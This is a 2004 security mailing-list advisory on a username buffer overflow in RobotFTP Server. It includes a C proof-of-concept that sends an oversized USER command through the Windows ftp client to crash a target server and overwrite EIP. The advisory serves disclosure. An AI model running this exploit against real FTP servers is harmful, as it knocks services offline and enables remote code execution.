[NT] RobotFTP Server USER Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 02/17/04

  • Next message: SecuriTeam: "[UNIX] Online Store Kit SQL Injection Vulnerability" 
    To: list@securiteam.com
Date: 17 Feb 2004 17:44:19 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      RobotFTP Server USER Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

     <http://http://www.robotftp.com/> RobotFTP Server is an "FTP server that
    will transform any windows computer into an FTP site and enable
    distribution of files to co-workers or friends. RobotFTP Server is
    extremely easy to setup and configure. You can create password protected
    or anonymous accounts, specify folders and files that are accessible for
    each account, and monitor activities of connected users." A vulnerability
    in the product allows remote attackers to cause RobotFTP to crash, while
    executing arbitrary code.

    DETAILS

    Vulnerable Systems:
     * RobotFTP version 1.0
     * RobotFTP version 2.0 beta 1

    A buffer overflow vulnerability in RobotFTP server in the username field
    that allows remote command execution.

    Exploit:
    /******************************
    this is example code for the vulnerability. It uses the windows ftp client
    to connect to a server
    ******************************/
    #include < stdio.h>

    char buffer[2500];
    char cmd[50];

    int main(int argc, char *argv[])
    {
      FILE *evil;

      if(argv[1] == NULL)
      {
        printf("Usage: %s [IP]\n\n",argv[0]);
        return 0;
      }

      memset(buffer,0x41,47);
      memcpy(buffer+47,"\r\n",2);
      memcpy(buffer+49,"crash",5);
      memcpy(buffer+54,"\r\n",2);
      memcpy(buffer+56,"USER ",5);
      memset(buffer+61,0x41,1989);
      memset(buffer+61+1989,0x58,4); // < < overwrites the eip with XXXX
      memcpy(buffer+65+1989,"\r\n",2);

      sprintf(cmd,"ftp -s:ftp.txt %s",argv[1]);

      if((evil = fopen("ftp.txt", "a+")) != NULL)
      {
        fputs(buffer, evil);
        fclose(evil);
        printf("- file written!\n");
      }
      else
      {
      fprintf(stderr, "ERROR: couldn't open ftp.txt!\n");
      exit(1);
      }
      system(cmd);

    }
    /*******************************/

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:nothing.king@firemail.de>
    gsicht gsicht.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] Online Store Kit SQL Injection Vulnerability"

    Relevant Pages